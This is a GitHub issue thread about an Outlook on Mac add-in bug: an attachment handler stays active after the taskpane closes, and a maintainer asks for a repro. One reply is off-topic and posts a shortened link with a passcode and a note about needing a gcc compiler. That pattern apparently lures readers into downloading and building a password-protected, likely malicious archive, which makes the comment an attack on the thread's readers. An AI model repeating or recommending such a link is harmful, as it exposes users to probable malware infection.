### ISSUE TITLE
Removing attachment handler (using Office.context.mailbox.item.removeHandlerAsync()) after closing taskpane does not work in Outlook on Mac (new UI)

### ISSUE THREAD

**Issue by cluB-Watermelon** [OfficeDev/office-js#4862]
We have a taskpane add-in on Outlook. When it is opened, it adds an attachment handler using Office.context.mailbox.item.addHandlerAsync(). When the taskpane is closed, we remove the attachment handler. While further processing the attachment, the attachment handler deletes the attachment from Outlook's compose window using Office.context.mailbox.item.removeAttachmentAsync(). 
The issue is, when the taskpane is closed, the attachment handler is not getting removed.
Even after the taskpane is closed, the attachment handler is still remaining active. As a result, any attachment that is added even after closing the taskpane gets deleted after some time. This issue is NOT observed on any platform other than Outlook on Mac (new UI).

## Your Environment
Outlook on Mac (new UI)
 
## Expected behavior
Once the taskpane is closed, the attachment handler should get removed. The issue is not observed in Outlook on Windows (new UI), or in Outlook on the web.

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by rkpathak** [comment]
@cluB-Watermelon Please share the addin that we can side load and test the scenario. Share the minimal addin that helps us repro the scenario. You can create a private repo and share it with @exextoc.
